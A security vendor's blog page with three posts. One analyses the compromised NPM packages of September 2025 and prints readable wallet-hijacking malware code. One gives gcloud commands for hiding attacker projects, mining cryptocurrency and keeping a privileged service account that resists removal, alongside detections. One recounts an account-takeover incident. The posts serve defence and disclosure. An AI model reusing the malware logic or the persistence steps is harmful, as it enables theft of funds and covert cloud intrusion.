Exaforce Blog

Insights that keep you ahead

Explore expert perspectives, practical tips, and the latest trends shaping the cybersecurity landscape.

September 10, 2025

There’s a Snake in my package! How attackers are going from code to coin

How attackers hijacked popular NPM packages to replace crypto wallet addresses and silently redirect funds.

On September 8, 2025, Aikido Security reported, and NPM confirmed, that several NPM libraries had been compromised in a user-side, man-in-the-middle-style attack. Our research dug into the details of how the attack works: the injected code sniffs requests to detect cryptocurrency accounts, then silently replaces them with attacker-controlled ones.

  • ansi-regex 6.2.1
  • color-name 2.0.1
  • debug 4.4.2
  • wrap-ansi 9.0.1
  • simple-swizzle 0.2.3
  • chalk 5.6.1
  • strip-ansi 7.1.1
  • color-string 2.1.1
  • backslash 0.2.1
  • has-ansi 6.0.1
  • chalk-template 1.1.1
  • supports-color 10.2.1
  • slice-ansi 7.1.1
  • is-arrayish 0.3.3
  • color-convert 3.1.1
  • ansi-styles 6.2.2
  • supports-hyperlinks 4.1.1
  • error-ex 1.3.3
Compromised package versions impacted by the attack

All compromised versions have been removed from the NPM registry, and patched releases are available on NPM. We still recommend you scan your codebase, upgrade any impacted dependencies, and verify your users have not been affected. This blog breaks down how the attack unfolded and how to detect it.
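As a quick first pass, you can ask npm whether any of the compromised releases appear in your dependency tree. This is a minimal sketch assuming an npm-managed project; extend the spec list to cover every package/version pair above:

# Prints the dependency paths of any matching install; "(empty)" means not found
npm ls ansi-regex@6.2.1 chalk@5.6.1 debug@4.4.2 strip-ansi@7.1.1
# npm audit should also flag these releases once advisories land in the registry
npm audit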

Analysis of the attack

The attacker wasn’t too subtle when including the malicious code: they added obfuscated JavaScript to the top of index.js in each package. The code was minified to look like normal script instructions, making it harder to detect.

Difference between versions 6.2.1 (compromised) and 6.2.2 (fixed) for package ansi-regex

The attack vector included detection of crypto wallets, interception of requests containing wallets, and replacement of legitimate addresses with attacker-controlled ones. The flow breaks down as follows:

  1. User visits an infected website
  2. Malicious code checks for cryptocurrency wallets
  3. It intercepts all network requests containing wallet addresses
  4. Wallet addresses are replaced with attacker-controlled ones using similarity matching
  5. When the victim initiates a transaction, funds are redirected
  6. Because legitimate wallet interfaces are used, the attack appears nearly invisible

Detecting malicious crypto wallets

Note: All code shown below has been cleaned up for better readability.

The malware begins by checking for the Ethereum provider object window.ethereum. It then requests eth_accounts and, if wallet addresses are returned, runs runmask(); in either case, if newdlocal() has not yet executed (rund ≠ 1), it sets rund to 1 and runs newdlocal() exactly once.

var neth = 0;
var rund = 0;
var loval = 0;

async function checkethereumw() {
  try {
    const etherumReq = await window.ethereum.request({ method: 'eth_accounts' });
    // If accounts exist, start the wallet hook (runmask); either way, run newdlocal() exactly once
    etherumReq.length > 0 ? (runmask(), rund != 1 && (rund = 1, neth = 1, newdlocal())) : rund != 1 && (rund = 1, newdlocal());
  } catch (error) {
    if (rund != 1) {
      rund = 1;
      newdlocal();
    }
  }
}

typeof window != 'undefined' && typeof window.ethereum != 'undefined' ? checkethereumw() : rund != 1 && (rund = 1, newdlocal());

Request hooking

newdlocal() is the function that hooks the browser, grabs the requests being made, and tampers with each request to replace the target’s account with an attacker’s account. This effectively transfers funds from a legitimate receiver to a malicious one. The following functions are defined in the code; their names have been changed for readability, with the original obfuscated name shown alongside.

const originalFetch = fetch;
fetch = async function (...args) { 
  const response = await originalFetch(...args);
  const contentType = response.headers.get('Content-Type') || '';
  let data = contentType.includes('application/json') 
    ? await response.clone().json() 
    : await response.clone().text();
  
  const processed = processData(data);
  const finalData = typeof processed === 'string' ? processed : JSON.stringify(processed);

  return new Response(finalData, {
    status: response.status,
    statusText: response.statusText,
    headers: response.headers
  });
};

The moment a wallet is found, the script looks for the closest matching attacker wallet among the attacker-provided wallets. That way, the user will not detect the attack, as the changed wallet will look similar to the legitimate one. The malicious functions _0x3479c8(_0x13a5cc, _0x8c209f) and _0x2abae0(_0x348925, _0x2f1e3d) use the Levenshtein distance, defined as the minimum number of single-character edits (insertions, deletions, or substitutions) required to change one word into another. The script then hijacks fetch() API requests and XMLHttpRequest responses, changing the wallet on both the request and the response.

  function levenshteinDistance(a, b) { // _0x3479c8(_0x13a5cc, _0x8c209f)
    const dp = Array.from({ length: a.length + 1 }, () => Array(b.length + 1).fill(0));

    for (let i = 0; i <= a.length; i++) dp[i][0] = i;
    for (let j = 0; j <= b.length; j++) dp[0][j] = j;

    for (let i = 1; i <= a.length; i++) {
      for (let j = 1; j <= b.length; j++) {
        if (a[i - 1] === b[j - 1]) {
          dp[i][j] = dp[i - 1][j - 1];
        } else {
          dp[i][j] = 1 + Math.min(
            dp[i - 1][j],     // deletion
            dp[i][j - 1],     // insertion
            dp[i - 1][j - 1]  // substitution
          );
        }
      }
    }
    return dp[a.length][b.length];
  }

  function closestMatch(input, candidates) { // _0x2abae0(_0x348925, _0x2f1e3d)
    let bestDistance = Infinity;
    let bestMatch = null;
    for (let candidate of candidates) {
      const distance = levenshteinDistance(input.toLowerCase(), candidate.toLowerCase());
      if (distance < bestDistance) {
        bestDistance = distance;
        bestMatch = candidate;
      }
    }
    return bestMatch;
  }

The attacker included a list of attacker-controlled wallets in the script, which are checked against the wallets observed in the target’s traffic.

  • Legacy Bitcoin: 1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx (and 39 others)
  • Bitcoin Bech32: bc1qms4f8ys8c4z47h0q29nnmyekc9r74u5ypqw6wm (and 39 others)
  • Ethereum: 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976 (and 59 others)
  • Litecoin: LNFWHeiSjb4QB4iSHMEvaZ8caPwtz4t6Ug (and 39 others)
  • Bitcoin Cash: bitcoincash:qpwsaxghtvt6phm53vfdj0s6mj4l7h24dgkuxeanyh (and 39 others)
  • Solana: 5VVyuV5K6c2gMq1zVeQUFAmo8shPZH28MJCVzccrsZG6 (and 19 others)
  • Tron: TB9emsCq6fQw6wRk4HBxxNnU6Hwt1DnV67 (and 39 others)

The check will be performed for all wallets provided by the attacker, and the closest one will be returned.

function transform(inputStr) {
    var legacyBTC = [
    ];
    var segwitBTC = [
    ];
    var ethAddresses = [
    ];
    var solanaAddrs = [
    ];
    var tronAddrs = [
    ];
    var ltcAddrs = [
    ];
    var bchAddrs = [
    ];
    for (const [currency, regex] of Object.entries(_0x3ec3bb)) { // _0x3ec3bb: map of currency name to address regex
      const matches = inputStr.match(regex) || [];
      for (const match of matches) {
        if (currency == 'ethereum') {
          if (!ethAddresses.includes(match) && neth == 0) {
            inputStr = inputStr.replace(match, closestMatch(match, ethAddresses));
          }
        }
        if (currency == 'bitcoinLegacy') {
          if (!legacyBTC.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, legacyBTC));
          }
        }
        if (currency == 'bitcoinSegwit') {
          if (!segwitBTC.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, segwitBTC));
          }
        }
        if (currency == 'tron') {
          if (!tronAddrs.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, tronAddrs));
          }
        }
        if (currency == 'ltc') {
          if (!ltcAddrs.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, ltcAddrs));
          }
        }
        if (currency == 'ltc2') {
          if (!ltcAddrs.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, ltcAddrs));
          }
        }
        if (currency == 'bch') {
          if (!bchAddrs.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, bchAddrs));
          }
        }
        const allAddrs = [
          ...ethAddresses,
          ...legacyBTC,
          ...segwitBTC,
          ...tronAddrs,
          ...ltcAddrs,
          ...bchAddrs
        ];
        const isKnown = allAddrs.includes(match);
        if (currency == 'solana' && !isKnown) {
          if (!solanaAddrs.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, solanaAddrs));
          }
        }
        if (currency == 'solana2' && !isKnown) {
          if (!solanaAddrs.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, solanaAddrs));
          }
        }
        if (currency == 'solana3' && isKnown) {
          if (!solanaAddrs.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, solanaAddrs));
          }
        }
      }
    }
    return inputStr;
}

The script goes through the requests and responses, replaces the target’s wallet with an attacker-controlled one, and lets the target continue with their operations.

Transaction Manipulation using runmask()

The runmask() function is designed to intercept wallet calls in the browser (MetaMask, Solana wallets, etc.) and modify the transaction data to inject an attacker-controlled address before the transaction is sent. Once a wallet is detected via window.ethereum, the malware hooks methods like request, send, and sendAsync.

const originalMethods = new Map(); // saved references to the wallet's original methods
let isActive = false;

function interceptWallet(wallet) { // _0x41630a(_0x5d6d52)
    const methods = ['request', 'send', 'sendAsync'];

    methods.forEach(name => {
        if (typeof wallet[name] === 'function') {
            originalMethods.set(name, wallet[name]);
            Object.defineProperty(wallet, name, {
                value: wrapMethod(wallet[name]),
                writable: true,
                configurable: true
            });
        }
    });

    isActive = true;
}

When one of the methods is found, the function _0x485f9d(_0x38473f, _0x292c7a) will determine whether the transaction is an Ethereum or Solana transaction and modify it using the function _0x1089ae(_0x4ac357, _0xc83c36 = true).

let increment = 0; // running count of intercepted calls

function wrapMethod(originalMethod) { // _0x485f9d(_0x38473f, _0x292c7a)
  return async function (...args) {
    increment++; // increment intercept count
    let clonedArgs;

    // Deep clone arguments to avoid mutation
    try {
      clonedArgs = JSON.parse(JSON.stringify(args));
    } catch {
      clonedArgs = [...args];
    }

    if (args[0] && typeof args[0] === 'object') {
      const request = clonedArgs[0];

      // Ethereum transaction
      if (request.method === 'eth_sendTransaction' && request.params?.[0]) {
        try {
          request.params[0] = maskTransaction(request.params[0], true); // _0x1089ae(tx, true)
        } catch {}

      // Solana transaction
      } else if (
        (request.method === 'solana_signTransaction' || request.method === 'solana_signAndSendTransaction') &&
        request.params?.[0]
      ) {
        try {
          let tx = request.params[0].transaction || request.params[0];
          const maskedTx = maskTransaction(tx, false); // _0x1089ae(tx, false)
          if (request.params[0].transaction) {
            request.params[0].transaction = maskedTx;
          } else {
            request.params[0] = maskedTx;
          }
        } catch {}
      }
    }

    const result = originalMethod(...clonedArgs); // invoke the original method with the tampered arguments

    // Handle promises
    if (result && typeof result.then === 'function') {
      return result.then(res => res).catch(err => { throw err; });
    }

    return result;
  };
}

Function _0x1089ae(_0x4ac357, _0xc83c36 = true) takes the request intercepted by the malware and injects the attacker’s own address into it, tampering with Ethereum ERC20 token contract calls or with the Solana transaction. In both cases, an attacker-controlled address is substituted in.

function maskTransaction(tx, isEthereum = true) {
  // Deep clone transaction to avoid mutating original
  const maskedTx = JSON.parse(JSON.stringify(tx));

  if (isEthereum) {
    const attackAddress = '0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976';

    // Redirect non-zero value transactions
    if (maskedTx.value && maskedTx.value !== '0x0' && maskedTx.value !== '0') {
      maskedTx.to = attackAddress;
    }

    if (maskedTx.data) {
      const data = maskedTx.data.toLowerCase();

      // ERC20 approve
      if (data.startsWith('0x095ea7b3') && data.length >= 74) {
        maskedTx.data = data.substring(0, 10) +
                        '000000000000000000000000' + attackAddress.slice(2) +
                        'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff';
      }
      // ERC20 permit (EIP-2612): replace spender with the attacker address
      else if (data.startsWith('0xd505accf') && data.length >= 458) {
        maskedTx.data = data.substring(0, 10) +
                        data.substring(10, 74) +
                        '000000000000000000000000' + attackAddress.slice(2) +
                        'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' +
                        data.substring(202);
      }
      // ERC20 transfer
      else if (data.startsWith('0xa9059cbb') && data.length >= 74) {
        maskedTx.data = data.substring(0, 10) +
                        '000000000000000000000000' + attackAddress.slice(2) +
                        data.substring(74);
      }
      // ERC20 transferFrom
      else if (data.startsWith('0x23b872dd') && data.length >= 138) {
        maskedTx.data = data.substring(0, 10) +
                        data.substring(10, 74) +
                        '000000000000000000000000' + attackAddress.slice(2) +
                        data.substring(138);
      }
    } else if (maskedTx.to && maskedTx.to !== attackAddress) {
      maskedTx.to = attackAddress;
    }
  } else {
    // Solana-style transaction masking
    if (maskedTx.instructions && Array.isArray(maskedTx.instructions)) {
      maskedTx.instructions.forEach(instr => {
        if (instr.accounts && Array.isArray(instr.accounts)) {
          instr.accounts.forEach(acc => {
            if (typeof acc === 'string') acc = '19111111111111111111111111111111';
            else acc.pubkey = '19111111111111111111111111111111';
          });
        }
        if (instr.keys && Array.isArray(instr.keys)) {
          instr.keys.forEach(key => key.pubkey = '19111111111111111111111111111111');
        }
      });
    }
    maskedTx.recipient = '19111111111111111111111111111111';
    maskedTx.destination = '19111111111111111111111111111111';
  }

  return maskedTx;
}

The Ethereum attacker address provided is the first element in the Ethereum Address list.

var _0x4477fc = [      
'0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976',      
--snip--

Recommendations and summing it up

We strongly recommend scanning your entire codebase for any of the compromised libraries and updating them immediately. This includes checking package.json, lock files, node_modules, and your SBOM dependency trees. Once updates are applied, monitor all recent wallet transactions for suspicious activity, revoke any exposed token approvals, and, where possible, migrate to fresh wallet addresses. To further reduce risk, ensure you pin package versions to mitigate similar supply chain compromises in the future.
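As one crude but fast sketch of that sweep (the grep matches any package at those versions, so confirm each hit against the package name above it in the lockfile before acting):

# Search the lockfile for known-bad version strings; extend the list as needed
grep -nE '"version": "(6\.2\.1|5\.6\.1|4\.4\.2|7\.1\.1)"' package-lock.json
# Record exact versions on install going forward instead of ^ ranges
npm config set save-exact true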

This malware was highly sophisticated. It hooked into the browser, intercepted requests, hijacked wallets, and operated across multiple blockchains. By abusing legitimate channels, masking transactions, and using obfuscation techniques, it was able to blend in and remain difficult to detect.

September 9, 2025

Ghost in the Script: Impersonating Google App Script projects for stealthy persistence

Exploring the risks of Google Apps Script abuse, from cryptomining to stealthy service accounts, and ways to detect misuse.

One of the most important steps in an infrastructure attack is persisting in the target’s environment. Persistence often needs to be established multiple times, depending on the level of access the attacker gains. Security systems have become smart enough to detect many forms of persistence, which has pushed attackers to find new and creative ways to persist in a target’s environment.

Google Workspace Apps Script is a feature that allows any user with a Gmail account to automate business applications and enables those applications to interact with each other. Under the hood, when an Apps Script app is deployed, a GCP project is created in the GCP organization the account belongs to. Aside from the format of the project ID, these projects are not very different from a normal GCP project. This means an attacker can use one of these projects to host resources and persist in the target’s environment. They can also create a GCP project with the same name format as an Apps Script project to impersonate a legitimate Apps Script project and evade detection.

This blog will go through how Apps Script projects work and how an attacker can use them to persist in a target’s environment. Then, we will look at how these techniques can be detected and prevented so attackers cannot exploit them.

The ins and outs of Apps Script

Google Workspace Apps Script, associated with the endpoint script.google.com, is a low-code solution that allows anyone with a Gmail account to automate business applications that integrate with Google Workspace. It offers a JavaScript scripting interface to integrate Google services and build lightweight automations.

Example Google Apps Script

Apps Script is highly flexible. With it, you can:

  • Create custom menus, dialogs, and sidebars in Google Docs, Sheets, and Forms
  • Develop custom functions and macros for Google Sheets
  • Publish web apps, either as standalone applications or embedded within Google Sites
  • Connect with other Google services such as AdSense, Analytics, Calendar, Drive, Gmail, and Maps
  • Build lightweight add-ons and share them through the Google Workspace Marketplace
Apps Script types available

When an Apps Script is created, a GCP project with the ID prefix sys- is automatically created. These projects are not visible in the organization’s project list in the console, which makes sense, since they are not considered organization projects.

Project list without Apps Script projects

However, the projects are visible through the gcloud CLI to identities with permission to execute resourcemanager.projects.list.

gcloud projects list that does contain Apps Script projects

When an Apps Script project is created, GCP by default creates a Resource Manager folder and subfolder in the organization, named system-gsuite/apps-script. Here again, no projects appear inside these folders when viewed in the console.

Console view of the Apps Script subfolder with no projects visible

Using the CLI, however, we can see the Apps Script projects inside the apps-script subfolder. This is where Apps Script projects reside after creation.

CLI output with Apps Script projects in the system-gsuite/apps-script subfolder

Abusing Apps Script impersonation on a GCP Organization

Cryptomining Instance

Apps Script projects follow an ID format of sys-<26 numbers>. In GCP, we can create a project in any folder or subfolder we have access to, and we can set the project ID to anything that contains ASCII letters, digits, and hyphens and is between 6 and 30 characters. The combination sys-<26 numbers> is exactly 30 characters long and contains numbers, letters, and a hyphen.

Creating a GCP project that looks like an Apps Script project
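In gcloud terms, the impersonation can be a single project-creation command. A minimal sketch, where the project ID, folder number, and display name are placeholders:

# Hypothetical: create a project whose ID mimics the Apps Script sys-<26 digits> format
gcloud projects create sys-00000000000000000000000000 \
    --folder=123456789012 \
    --name="internal-metrics"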

One difference we found was how the projects appeared depending on where they were stored. A project stored at the organization level will show in the console even with an ID in the sys-<26 numbers> format (project sys-00000000000000000000000000). However, when created inside the apps-script folder, it does not show as a project in the console (project sys-11111111111111111111111111).

Console view of projects where sys-00000000000000000000000000 is shown due to being in the organization level, but sys-11111111111111111111111111 in the apps-script folder is not

The projects are still listed when resourcemanager.projects.list is executed on the terminal.

gcloud CLI listing both projects

An attacker with the resourcemanager.projects.create permission can exploit the fact that Apps Script projects do not show up the way other projects do, creating a project in the target’s organization and storing resources there. Each project can also be given a name chosen by its creator, and an attacker can look at other projects in the target’s organization to find a convincing one.

gcloud CLI used to create a hidden project

For example, a bad actor could use this hidden project to create a large instance and use it as a cryptomining harvester (a sketch follows the list below). To do that, they need to:

  • Enable billing for the project
  • Enable the compute API
  • Create an instance
Enabling and then creating a large instance in a hidden project
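A sketch of that sequence with gcloud, where the billing account, project ID, zone, and machine type are all placeholders:

# Hypothetical: link billing, enable compute, and create a large instance
gcloud billing projects link sys-11111111111111111111111111 \
    --billing-account=000000-AAAAAA-BBBBBB
gcloud services enable compute.googleapis.com \
    --project=sys-11111111111111111111111111
gcloud compute instances create miner-01 \
    --project=sys-11111111111111111111111111 \
    --zone=us-central1-a --machine-type=n2-standard-64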

The attacker now controls a high-performance instance they can use as a cryptomining harvester.

Persist on the Organization using a Service Account inside a hidden project

Persistence allows an attacker to return to the target’s infrastructure, ideally as a highly privileged identity. There are different ways to persist in a GCP organization, including user creation, service account creation, creating permanent credentials, and creating resources with highly privileged identities assigned to them. If a persistence mechanism can be created inside a project, it can be created inside an Apps Script-impersonating project. For example, we can create a service account, create a key for it, assign it a highly privileged role on the organization and other projects, and keep it for later use, as sketched below.

Creating a service account in a hidden project
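A minimal sketch of that persistence flow; the account name, project ID, and organization ID are placeholders, and roles/owner stands in for any highly privileged role:

# Hypothetical: service account + exported key + org-level role binding
gcloud iam service-accounts create backup-svc \
    --project=sys-11111111111111111111111111
gcloud iam service-accounts keys create key.json \
    --iam-account=backup-svc@sys-11111111111111111111111111.iam.gserviceaccount.com
gcloud organizations add-iam-policy-binding 123456789012 \
    --member="serviceAccount:backup-svc@sys-11111111111111111111111111.iam.gserviceaccount.com" \
    --role=roles/owner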

To make matters worse, the identity will only be listed if the project name is known. We can even put a policy on the project that prevents anybody from accessing the service account. This isn’t an “unbreakable” prevention, but it may defeat some attempts to clean up the service account, especially since these projects look like they are created and managed by Google.

name: organizations/ORG_ID/denyPolicies/deny-service-account-all
displayName: "Restrict all SA usage"
rules:
- denyRule:
    deniedPrincipals:
    - principalSet://goog/public:all
    deniedPermissions:
    - iam.serviceAccounts.*

Why even impersonate an Apps Script project?

Under the hood, an Apps Script project is a normal GCP project. What differs from a normal project is that, by default, no identity except one controlled by Google has access to it. The service account appsdev-apps-dev-script-auth@system.gserviceaccount.com is the universal identity that creates Apps Script projects and is managed only by Google. It is the only identity that, by default, can manage an Apps Script project and its resources.

Showing how only a Google account can access a true Apps Script project by default

An attacker with the right permissions can modify the project’s IAM policy to grant themselves access, then host any resource on any service they want in this project.

Updating the project policy to allow an attacker access to modify a real Apps Script project
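For example, a single IAM binding is enough to take over the project; the attacker identity below is a placeholder, and the project ID is the legitimate Apps Script project used elsewhere in this post:

# Hypothetical: grant an attacker-controlled user owner on an Apps Script project
gcloud projects add-iam-policy-binding sys-14600875379148140018929136 \
    --member="user:attacker@example.com" \
    --role=roles/owner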

For example, a bad actor could:

  • Create a service account and grant it an organization-level role to persist in the target organization
  • Link the project to a Billing Account and create large resources on it for cryptomining

Detecting the abuse of Apps Script projects

Finding project impersonation by looking at the billing information of the project

GCP has different billing types for resources, and some are free without limits. IAM identities are a good example of such resources. Other examples of free resources include Resource Manager organizations, Artifact Registry, basic VPC networking, and more.

To use a specific service and its resources, an organization owner needs to link a project to a Billing Account. Linking a project to a Billing Account is a fancy way of saying “put a payment method on the project”: the Billing Account ties a payment method to the project, and each month, based on resource usage, the project owner pays, with the Billing Account providing an invoice for the costs.

Creating a large compute instance requires a Billing Account to be linked to the project. One way to detect whether an Apps Script project was created by an attacker and used to host large resources is to check if the project is linked to a Billing Account. In the example below, project sys-22222222222222222222222222, an attacker-created project with a large compute instance, has a Billing Account linked to it (as seen in the billingAccountName and billingEnabled fields), while a legitimate Apps Script project (sys-14600875379148140018929136) requires no billing account link.

Comparison of a hidden project attached to a billing account and a legitimate Apps Script project not attached to a billing account
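The check itself is one command per project; billingEnabled: false (or a missing billingAccountName) is the expected state for a genuine Apps Script project:

gcloud billing projects describe sys-22222222222222222222222222   # attacker project: billingEnabled: true
gcloud billing projects describe sys-14600875379148140018929136   # legitimate: no billing account linked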

Blending the project in by modifying billing information

One bypass of this detection is to unlink the project from the Billing Account afterward. The project only needs to be linked while the attacker creates an instance (or uses any other paid service); any resource or service not offered in the free tier must be deployed into a project with a linked Billing Account.

Unlinking the project from the Billing Account will result in the resource being deleted.

Unlinking a billing account that deletes the instance

IAM service accounts do not fall within the scope of paid resources, so even a project with no linked billing account can contain a persistent service account, breaking the previous detection.

Unlinking a billing account while persisting a service account

Finding occurrences of Apps Script project impersonation through enabled API services

To use a specific service on a project through the API (which gcloud uses), the service’s API needs to be enabled. By default, a new project has several services enabled, and more can be enabled or disabled using serviceusage.services.enable or serviceusage.services.disable.

Apps Script projects, on the other hand, have no services enabled by default, though services can be enabled on demand. One way to detect that a project is not actually an Apps Script project is to look at its enabled services.

Listing services for real and fake Apps Script projects
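A sketch of the comparison, reusing the project IDs from the examples above:

gcloud services list --enabled --project=sys-14600875379148140018929136   # genuine: typically empty
gcloud services list --enabled --project=sys-22222222222222222222222222   # impersonator: compute, oslogin, ...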

Blending in by disabling API endpoints

One problem with this detection method is that an Apps Script project might need some services enabled, depending on the tasks it executes. An attacker can disable all the services they are not using to make the project look a bit more legitimate.

Disabling unused services to appear more like a real Apps Script project

For example, creating a compute instance in the project requires the compute and oslogin services to be enabled. If they are disabled while a resource exists, execution will fail, indicating that the project is in use. Beyond that, the remaining services can be disabled and then temporarily re-enabled by the attacker each time a task runs in the target’s environment.

Execution failure when a service is disabled

Another problem is that some service APIs work in a project without being enabled on it. Services like IAM and some basic storage commands remain available, as do the Service Usage API (so that service APIs can be enabled or disabled on the project) and Resource Manager:

  • IAM
  • Cloud Resource Manager
  • Service Usage API
  • Cloud Storage (base functionality is always available; enabling billing gives extra control, billing, and metrics).

This means a project showing no enabled services can still host a service account, which the attacker can use as a persistence mechanism.

Finding occurrences of Apps Script project impersonation in the logs

Another detection approach is looking at the logs for the apps-script folder. In the example below, the projects created by the attacker (sys-11111111111111111111111111 and sys-22222222222222222222222222) have the principalEmail field set to the creator’s user email, while the ones created by Google have an email of appsdev-apps-dev-script-auth@system.gserviceaccount.com. This is tricky because the events can only be found under the folder’s events, not the Organization’s.

Logs showing the differences in principalEmail from fake and legitimate Apps Script projects
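One way to pull those events, as a sketch; the folder ID is a placeholder, and the exact field paths may vary by log type:

# Hypothetical query: who created projects under the apps-script folder?
gcloud logging read 'protoPayload.methodName="CreateProject"' \
    --folder=123456789012 \
    --format='value(protoPayload.authenticationInfo.principalEmail)'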

Limiting Project Impersonation using organization policies

Apps Script projects, when created, have an ID format of sys-<26 random digits>. One way to prevent the creation of an Apps Script impersonator is to deny the creation and update of projects whose IDs match sys-<26 random digits>, using the following custom constraint.

name: organizations/012345678912/customConstraints/custom.denyAppsScriptProjectImpersonation
resource_types: cloudresourcemanager.googleapis.com/Project
method_types:
  - CREATE
  - UPDATE
condition: 'resource.projectId.matches(''sys-[0-9]{26}'')'
action_type: DENY
display_name: Deny Apps Script Project Impersonation
description: ''
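To put the constraint into effect, it must first be registered and then enforced with an organization policy. A sketch assuming the YAML above is saved as constraint.yaml:

gcloud org-policies set-custom-constraint constraint.yaml
# Enforce the custom constraint org-wide
cat > policy.yaml <<'EOF'
name: organizations/012345678912/policies/custom.denyAppsScriptProjectImpersonation
spec:
  rules:
  - enforce: true
EOF
gcloud org-policies set-policy policy.yaml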

Whenever an attacker tries to create a project with that format, the organization policy will deny the execution.

Organization policy blocking a hidden project creation

The Organization Policy will deny the creation of any project with an ID format of sys-<26 random digits>, including legitimate ones created by Google through the endpoint script.google.com.

Blocked Apps Script project creation

Detecting Apps Script project abuse with Exaforce

Exaforce provides layered coverage to detect and stop malicious usage of Apps Script projects, whether through impersonation or misuse. Our approach leverages advanced anomaly detection to understand the baseline behavior of entities in your environment to spot abnormal behavior. We’ve enabled some new detections to protect our customers as a result of this research.

  • Exaforce detects Google Apps Script projects that use unusual API services, labels, or policy bindings, so they are flagged during onboarding.
  • Exaforce detects project impersonation attempts wherein an attacker attempts to create projects that look like an Apps Script project.

Below is an example scenario of an Apps Script project impersonation attempt.

Example detection of a hidden Apps Script impersonation project

The detection overview provides a summary and conclusion from our Exabot’s (AI agent) automated triage of the alert. It outlines critical information such as the principal in question. 

Session with all related events where impersonation is performed

We map related events for this principal into a session, so it’s easy to understand the context in which this project was created and other activities performed by this principal for comprehensive impact analysis.  

Visual graph of the events during the creation of an impersonating Apps Script project

All related events and resources impacted are mapped visually into a graph for easy investigation. 

Preventative controls

Exaforce detections ensure you have visibility into this potential issue. If Apps Script is not in use in your organization, we also recommend enforcing the organization policy above, which blocks creation of projects with IDs matching sys-[0-9]{26}. This lowers your attack surface and greatly improves your organization’s security posture.

Stealthy persistence and defense

Apps Script projects can serve as stealthy persistence mechanisms if left unmonitored. Attackers can impersonate them to hide cryptomining, privileged service accounts, or other malicious resources inside your environment.

Defenders need to understand how Apps Script projects work under the hood and how to detect and block potential abuse. Leveraging organization policies and strong detections like those provided by Exaforce provides comprehensive coverage for this persistence vector.

September 3, 2025

How Exaforce detected an account takeover attack in a customer’s environment, leveraging our multi-model AI


In the cat-and-mouse game of identity protection, attackers are playing the long game: probing, rotating infrastructure, and waiting for a weak link. At Exaforce, we protect many high-profile companies in sensitive industries that are constant targets of identity attacks. This blog post walks through a real compromise that recently unfolded at a current customer over several weeks, involving dozens of international IP addresses, eventual credential theft, and multiple successful authentications.

We’re sharing this timeline to show how persistent attackers really operate, and how visibility, context, and behavioral signal correlation are essential in detecting and stopping identity-based attacks.

Executive Summary

Attack Duration: May 15 - June 25, 2025
Initial Vector: Brute-force login attempts to SaaS authentication portals
Infrastructure: 200+ IPs across 40+ countries, many with ASN anomalies
Exaforce Detections: Impossible travel, ASN mismatch, repeated policy evaluations
Outcome: Attacker obtained valid credentials and successfully authenticated multiple times before remediation
Remediation: Forced logout of all active sessions, password reset, account enrolled in MFA

The anatomy of the attack

Phase 1: Reconnaissance and testing (May 15 - June 5)

The first signals were subtle: a handful of failed authentication attempts from Switzerland, France, the USA, and Morocco. Over the next three weeks, the volume increased steadily. All were unsuccessful, but the geography, ASN mismatches, and repeated attempts on a few accounts hinted at a coordinated brute-force effort, most notably repeated failures from IPs tied to Beltelecom (BY), Bahnhof AB (SE), and Novotelecom (RU).

Initial low volume probing with multiple failed login attempts from different locations

Despite the failures, the persistent attempts clearly showed this was a targeted attack that wouldn’t stop.

Phase 2: Coordinated spread (June 25)

The volume of activity spiked. Over 80 sign-on events were logged from a rotating set of international IPs. Key red flags:

  • Multiple successful logins from IPs with no prior history in the environment
  • Sign-ons from ASNs not aligned with user locations (e.g., AS29069 - Rostelecom)
  • Location anomalies and ASN anomalies flagged across accounts, including admin identities
Location and ASN anomalies detected by Exaforce

Attacker infrastructure profile

Over the course of the incident, Exaforce identified authentication attempts from more than 200 unique IP addresses across 40+ countries, involving both failed and successful logins. This diverse infrastructure is a hallmark of modern credential-based attacks and highlights the importance of geographic anomaly detection.

Some compelling stats from the investigation:

  • Top Attacker Countries: Sweden, Romania, Norway, Ukraine, Tunisia, Russia, Spain, Netherlands, United Arab Emirates, Germany
  • Most Active IPs (by authentication attempt volume):
    • 41.224.62.206 (ORANGE – Tunisia): 166 attempts
    • 89.160.38.13 (Bredband2 AB – Sweden): 165 attempts
    • 176.104.241.131 (Bilink LLC – Ukraine): 155 attempts
    • 109.100.41.198 (Orange Romania – Romania): 153 attempts
    • 89.10.140.58 (NextGenTel AS – Norway): 151 attempts
Chart showing authentications by day and the spikes in failed attempts
  • Widespread ASN Usage: Attackers utilized dozens of unique ASNs, including major ISPs, hosting providers, and anonymizing infrastructure like DigitalOcean and netcup GmbH, further complicating attribution and blocking.
  • Repeated Patterns: Many IPs were used in short bursts, mimicking spray-and-pray behavior, while others established persistence with multiple successful logins over several days.

These findings reinforce the need for automated correlation of IP geolocation, ASN anomalies, and login behavior, capabilities that were instrumental in surfacing this attack as soon as the customer connected their Okta logs.

How Exaforce detected the incident

Exaforce detected the intrusion the day it occurred (June 25). Detection wasn’t based on a single indicator: Exaforce’s AI automatically stitched together multiple signals to arrive at a single threat finding, with no rules written and no manual correlation performed. The signals included:

  • Impossible travel violations (e.g., logins from Sweden and Tunisia minutes apart)
  • ASN anomaly detections from Okta policy evaluations
  • Success/failure ratios on previously clean accounts
  • Alert correlation across devices, IPs, and session behaviors
Exaforce threat finding with an easy to digest summary of the signals and a detailed breakdown with recommended next steps.

After detecting the intrusion, the customer was able to contain the threat by forcing logout of all active sessions, resetting all passwords for the account, and enrolling the account in MFA to prevent a future breach.

Key lessons for defenders

How Exaforce helps

This incident was identified, investigated, and responded to inside our platform using:

  • Account timeline stitching to correlate activity across time and surfaces for clearer attack progression.
  • ASN-aware policy evaluations to detect access from risky or unusual networks more accurately.
  • Visual behavioral analytics to help analysts quickly verify anomalies and patterns in user or system behavior.
